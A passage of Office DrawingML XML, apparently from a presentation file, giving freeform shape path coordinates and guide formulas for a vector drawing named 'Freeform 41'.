                    <a:lnTo>
                      <a:pt x="136" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="156" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="8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70" name="Freeform 41"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="425" y="2268"/>
                <a:ext cx="239" cy="148"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 734"/>
                  <a:gd name="T1" fmla="*/ 0 h 454"/>
                  <a:gd name="T2" fmla="*/ 0 w 734"/>
                  <a:gd name="T3" fmla="*/ 0 h 454"/>
                  <a:gd name="T4" fmla="*/ 0 w 734"/>
                  <a:gd name="T5" fmla="*/ 0 h 454"/>
                  <a:gd name="T6" fmla="*/ 0 w 734"/>
                  <a:gd name="T7" fmla="*/ 0 h 454"/>
                  <a:gd name="T8" fmla="*/ 0 w 734"/>
                  <a:gd name="T9" fmla="*/ 0 h 454"/>
                  <a:gd name="T10" fmla="*/ 0 w 734"/>
                  <a:gd name="T11" fmla="*/ 0 h 454"/>
                  <a:gd name="T12" fmla="*/ 0 w 734"/>
                  <a:gd name="T13" fmla="*/ 0 h 454"/>
                  <a:gd name="T14" fmla="*/ 0 w 734"/>
                  <a:gd name="T15" fmla="*/ 0 h 454"/>
                  <a:gd name="T16" fmla="*/ 0 w 734"/>
                  <a:gd name="T17" fmla="*/ 0 h 454"/>
                  <a:gd name="T18" fmla="*/ 0 w 734"/>
                  <a:gd name="T19" fmla="*/ 0 h 454"/>
                  <a:gd name="T20" fmla="*/ 0 w 734"/>
                  <a:gd name="T21" fmla="*/ 0 h 454"/>
                  <a:gd name="T22" fmla="*/ 0 w 734"/>
                  <a:gd name="T23" fmla="*/ 0 h 454"/>
                  <a:gd name="T24" fmla="*/ 0 w 734"/>
                  <a:gd name="T25" fmla="*/ 0 h 454"/>
                  <a:gd name="T26" fmla="*/ 0 w 734"/>
                  <a:gd name="T27" fmla="*/ 0 h 454"/>
                  <a:gd name="T28" fmla="*/ 0 w 734"/>
                  <a:gd name="T29" fmla="*/ 0 h 454"/>
                  <a:gd name="T30" fmla="*/ 0 w 734"/>
                  <a:gd name="T31" fmla="*/ 0 h 454"/>
                  <a:gd name="T32" fmla="*/ 0 w 734"/>
                  <a:gd name="T33" fmla="*/ 0 h 454"/>
                  <a:gd name="T34" fmla="*/ 0 w 734"/>
                  <a:gd name="T35" fmla="*/ 0 h 454"/>
                  <a:gd name="T36" fmla="*/ 0 w 734"/>
                  <a:gd name="T37" fmla="*/ 0 h 454"/>
                  <a:gd name="T38" fmla="*/ 0 w 734"/>
                  <a:gd name="T39" fmla="*/ 0 h 454"/>
                  <a:gd name="T40" fmla="*/ 0 w 734"/>
                  <a:gd name="T41" fmla="*/ 0 h 454"/>
                  <a:gd name="T42" fmla="*/ 0 w 734"/>
                  <a:gd name="T43" fmla="*/ 0 h 454"/>
                  <a:gd name="T44" fmla="*/ 0 w 734"/>
                  <a:gd name="T45" fmla="*/ 0 h 454"/>
                  <a:gd name="T46" fmla="*/ 0 w 734"/>
                  <a:gd name="T47" fmla="*/ 0 h 454"/>
                  <a:gd name="T48" fmla="*/ 0 w 734"/>
                  <a:gd name="T49" fmla="*/ 0 h 454"/>
                  <a:gd name="T50" fmla="*/ 0 w 734"/>
                  <a:gd name="T51" fmla="*/ 0 h 454"/>
                  <a:gd name="T52" fmla="*/ 0 w 734"/>
                  <a:gd name="T53" fmla="*/ 0 h 454"/>
                  <a:gd name="T54" fmla="*/ 0 w 734"/>
                  <a:gd name="T55" fmla="*/ 0 h 454"/>
                  <a:gd name="T56" fmla="*/ 0 w 734"/>
                  <a:gd name="T57" fmla="*/ 0 h 454"/>
                  <a:gd name="T58" fmla="*/ 0 w 734"/>
                  <a:gd name="T59" fmla="*/ 0 h 454"/>
                  <a:gd name="T60" fmla="*/ 0 w 734"/>
                  <a:gd name="T61" fmla="*/ 0 h 454"/>
                  <a:gd name="T62" fmla="*/ 0 w 734"/>
                  <a:gd name="T63" fmla="*/ 0 h 454"/>
                  <a:gd name="T64" fmla="*/ 0 w 734"/>
                  <a:gd name="T65" fmla="*/ 0 h 454"/>
                  <a:gd name="T66" fmla="*/ 0 w 734"/>
                  <a:gd name="T67" fmla="*/ 0 h 454"/>
                  <a:gd name="T68" fmla="*/ 0 w 734"/>
                  <a:gd name="T69" fmla="*/ 0 h 454"/>
                  <a:gd name="T70" fmla="*/ 0 w 734"/>
                  <a:gd name="T71" fmla="*/ 0 h 454"/>
                  <a:gd name="T72" fmla="*/ 0 w 734"/>
                  <a:gd name="T73" fmla="*/ 0 h 454"/>
                  <a:gd name="T74" fmla="*/ 0 w 734"/>
                  <a:gd name="T75" fmla="*/ 0 h 454"/>
                  <a:gd name="T76" fmla="*/ 0 w 734"/>
                  <a:gd name="T77" fmla="*/ 0 h 454"/>
                  <a:gd name="T78" fmla="*/ 0 w 734"/>
                  <a:gd name="T79" fmla="*/ 0 h 454"/>
                  <a:gd name="T80" fmla="*/ 0 w 734"/>
                  <a:gd name="T81" fmla="*/ 0 h 454"/>
                  <a:gd name="T82" fmla="*/ 0 w 734"/>
                  <a:gd name="T83" fmla="*/ 0 h 454"/>
                  <a:gd name="T84" fmla="*/ 0 w 734"/>
                  <a:gd name="T85" fmla="*/ 0 h 454"/>
                  <a:gd name="T86" fmla="*/ 0 w 734"/>
                  <a:gd name="T87" fmla="*/ 0 h 454"/>
                  <a:gd name="T88" fmla="*/ 0 w 734"/>
                  <a:gd name="T89" fmla="*/ 0 h 454"/>
                  <a:gd name="T90" fmla="*/ 0 w 734"/>
                  <a:gd name="T91" fmla="*/ 0 h 454"/>
                  <a:gd name="T92" fmla="*/ 0 w 734"/>
                  <a:gd name="T93" fmla="*/ 0 h 454"/>
                  <a:gd name="T94" fmla="*/ 0 w 734"/>
                  <a:gd name="T95" fmla="*/ 0 h 454"/>
                  <a:gd name="T96" fmla="*/ 0 w 734"/>
                  <a:gd name="T97" fmla="*/ 0 h 454"/>
                  <a:gd name="T98" fmla="*/ 0 w 734"/>
                  <a:gd name="T99" fmla="*/ 0 h 454"/>
                  <a:gd name="T100" fmla="*/ 0 w 734"/>
                  <a:gd name="T101" fmla="*/ 0 h 454"/>
                  <a:gd name="T102" fmla="*/ 0 w 734"/>
                  <a:gd name="T103" fmla="*/ 0 h 454"/>
                  <a:gd name="T104" fmla="*/ 0 w 734"/>
                  <a:gd name="T105" fmla="*/ 0 h 454"/>
                  <a:gd name="T106" fmla="*/ 0 w 734"/>
                  <a:gd name="T107" fmla="*/ 0 h 454"/>
                  <a:gd name="T108" fmla="*/ 0 w 734"/>
                  <a:gd name="T109" fmla="*/ 0 h 454"/>
                  <a:gd name="T110" fmla="*/ 0 w 734"/>
                  <a:gd name="T111" fmla="*/ 0 h 454"/>
                  <a:gd name="T112" fmla="*/ 0 w 734"/>
                  <a:gd name="T113" fmla="*/ 0 h 454"/>
                  <a:gd name="T114" fmla="*/ 0 w 734"/>
                  <a:gd name="T115" fmla="*/ 0 h 454"/>
                  <a:gd name="T116" fmla="*/ 0 w 734"/>
                  <a:gd name="T117" fmla="*/ 0 h 4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34"/>
                  <a:gd name="T178" fmla="*/ 0 h 454"/>
                  <a:gd name="T179" fmla="*/ 734 w 734"/>
                  <a:gd name="T180" fmla="*/ 454 h 4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34" h="454">
                    <a:moveTo>
                      <a:pt x="0" y="395"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="233" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="444"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="440"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="437"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="304" y="434"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="332" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="366" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="433"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="432"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="427"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="417"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="449" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="411"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="408"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="407"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="479" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="486" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="403"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="500" y="402"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="387"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="521" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="523" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="522" y="372"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="371"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="370"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="369"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="366"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="490" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="356"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="353"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="570" y="345"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="574" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="568" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="561" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="554" y="329"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="546" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="539" y="323"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="319"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="318"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="316"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="532" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="538" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="569" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="629" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="644" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="653" y="303"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="651" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="293"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="642" y="288"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="647" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="667" y="280"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="678" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="276"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="714" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="728" y="266"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="730" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="727" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="720" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="700" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="669" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="666" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="682" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="697" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="702" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="705" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="704" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="699" y="203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="692" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="688" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="677" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="668" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="657" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="645" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="634" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="624" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="201"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="611" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="614" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="617" y="187"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="626" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="649" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="170"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="681" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="690" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="689" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="680" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="670" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="658" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="643" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="139"/>
                    </a:lnTo>
